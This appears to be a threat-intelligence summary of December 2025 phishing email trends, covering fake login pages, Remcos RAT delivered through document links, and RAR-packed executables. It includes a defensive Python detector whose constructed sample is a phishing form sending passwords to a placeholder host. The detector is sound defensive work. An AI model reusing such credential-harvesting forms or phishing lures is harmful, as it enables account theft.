December 2025 Phishing Email Trends Report
This report provides distribution volumes, statistics, trends, and case information on phishing emails collected and analyzed during December 2025. The following statistics and cases are included in the original report.
1) Statistics of phishing email threats
In December 2025, the most common threat type among phishing emails was phishing (91%). Threat actors used scripts such as HTML to mimic the screen layout, logo, and font of login pages and advertising pages. These pages prompt users to enter their account credentials, which are then sent to the threat actor’s C2 server, or lure users to fake websites. This type of phishing also involves inserting hyperlinks into documents such as PDFs to direct users to phishing websites created by threat actors.

Figure 1. Phishing email threat statistics
The report also shows recent trends in phishing email threats by providing data on the distribution of samples by category over the past six months. Additionally, statistics on the file extensions of attachments found in phishing emails are provided, giving readers an understanding of the file formats used in phishing emails. Readers can refer to the original ATIP report for other statistics not covered in this summary.
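The HTML attachments described above collect credentials through a form that submits to a server the threat actor controls. The following is an added example, not code from the original report: a static triage check that flags password forms in an HTML attachment whose `action` points at a remote host. The sample attachment and the host `collector.example` are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Collect every <form> together with its action URL and input types."""

    def __init__(self):
        super().__init__()
        self.forms = []      # one dict per <form> seen
        self._open = None    # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", "").strip(),
                          "method": a.get("method", "get").lower(),
                          "input_types": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["input_types"].append(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def credential_forms(html_text):
    """Return forms that ask for a password and submit it to a remote host."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        target = urlparse(form["action"])
        remote = target.scheme in ("http", "https") and bool(target.netloc)
        if "password" in form["input_types"] and remote:
            findings.append({"host": target.hostname, "method": form["method"]})
    return findings


# Constructed sample attachment; collector.example is a placeholder host.
SAMPLE = """<html><body><img src="logo.png">
<form method="POST" action="https://collector.example/login.php">
<input type="email" name="user"><input type="password" name="pass">
<input type="submit" value="Sign in"></form>
<form action="/search"><input type="text" name="q"></form></body></html>"""

if __name__ == "__main__":
    print(credential_forms(SAMPLE))
```

This check only covers plain form submission; attachments that send credentials from script code need dynamic or script-level analysis.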
2) Distribution of Korean-language emails
This section categorizes cases that consist of Korean text and partially discloses the subject and attachment file names of each sample. This information allows readers to identify keywords that frequently appear in phishing email threats.

Figure 2. Part of the list of phishing emails distributed in Korean
3) Analysis of phishing email distribution cases
Representative cases were analyzed according to the format of the attachments (Script, Document, Compress), showing the phishing email attacks that actually occurred this month. This month, not only were phishing pages (FakePage) attached in Script format, but Remcos RAT malware was also distributed via phishing emails using Document attachments. The document file contains a hyperlink (C2) that downloads additional malware. When the downloaded malware is executed, Remcos RAT is run. In addition, there has been a recent increase in cases where an EXE file is compressed into a RAR archive and distributed via a phishing email. Additional information, including the C2 address, analysis information, and the body of the phishing email that distributed the malware, can be found in the original ATIP report and ATIP Notes.

Figure 3. Malware distributed as an attachment in Document format

Figure 4. Malware distributed as an attachment in Compress format
This post discloses part of the December 2025 Phishing Email Trends Report. The original ATIP report contains additional information, such as the recent distribution trends of phishing (FakePage) and malware, statistics on the distribution by attachment file extension, and analysis of actual phishing email attacks.